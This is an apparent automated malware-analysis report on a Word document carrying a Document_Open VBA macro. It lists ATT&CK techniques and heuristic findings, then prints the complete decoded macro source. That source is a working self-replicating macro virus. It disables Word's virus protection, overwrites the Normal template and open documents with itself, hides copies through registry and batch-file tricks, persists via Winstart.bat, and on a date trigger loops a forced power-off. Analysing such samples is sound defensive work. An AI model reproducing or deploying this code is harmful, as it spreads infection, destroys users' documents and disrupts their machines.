MALICIOUS
168
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1505.003 Server Software Component: Service Execution
T1059 Command and Scripting Interpreter
The sample is a Microsoft Word document containing a Document_Open VBA macro. This macro is designed to copy itself into the Normal template and the active document, effectively infecting them. It also utilizes the Shell() function, indicating an intent to execute arbitrary commands or payloads. The macro attempts to achieve AV stealth by modifying registry keys related to file associations.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3343 bytes |
SHA-256: 6bd02220373e28af9548082fcaf7cf1d7715d3b59ed1503349b857f9584ded8e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Visible = False
ShellDoc = Environ("WINDIR") & "\ShellNew\" & System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TD = ThisDocument.VBProject.VBComponents(1).CodeModule
VCode = TD.Lines(1, TD.CountOfLines)
If Normal.ThisDocument.ReadOnly = 0 Then
NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
NormalTemplate.Save
Else
SetAttr (NormalTemplate.FullName), vbArchive
End If
If ActiveDocument.ReadOnly = 0 Then
AD.DeleteLines 1, AD.CountOfLines: AD.InsertLines 1, VCode
ActiveDocument.Save
End If
'>-- Check if we are Master Document
If UCase(ActiveDocument.FullName) = UCase(ShellDoc) Then
ActiveDocument.Save
NormalTemplate.Saved = True
Application.Quit
End If
'>-- Infect Master Document
If ND.CountOfLines > 25 Then
If GetAttr(ShellDoc) <> 0 Then
SetAttr (ShellDoc), 0
Shell Application.Path & "\Winword.exe " & ShellDoc, vbMinimizedNoFocus
End If
End If
'AV Stealth in: HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew Filename
Randomize Timer
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
STL = "Ver_" & Int(Rnd * 9999) & ".dat"
If UCase(chkSt) <> Right(ShellDoc, Len(ShellDoc) - 12) Then Name ShellDoc As Environ("WinDir") & "\ShellNew\" & STL
System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename") = STL
'Reinkanation:
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
FileCopy NormalTemplate.FullName, Environ("WinDir") & "\Java\X.cls" 'Kopiere NormalTemplate
FileCopy Environ("WINDIR") & "\ShellNew\" & chkSt, Environ("WinDir") & "\Java\Y.cls" 'Kopiere Winword8.doc
x = Int(Rnd * 55) + 200: y = Int(Rnd * 19) + 238: z = Int(Rnd * 30) + 21 'Zufallszahlen
Open "Tarnkappe.bat" For Output As #1
Print #1, "ren " & Environ("WinDir") & "\Java\X.cls " & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls"
Print #1, "ren " & Environ("WinDir") & "\Java\Y.cls " & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls"
Print #1, "del Tarnkappe.bat"
Open Environ("WinDir") & "\Winstart.bat" For Output As #2
Print #2, "@echo off"
Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls " & NormalTemplate.FullName
Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls " & Environ("WinDir") & "\ShellNew\" & chkSt
Close
Shell "Tarnkappe.bat", vbHide
Eclipse:
If Day(Now) <> Month(Now) Then Exit Sub
Do
Shell Environ("WinDir") & "\Rundll32.exe Kernel32,SetSystemPowerState", vbHide 'The lord says power off
Loop
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.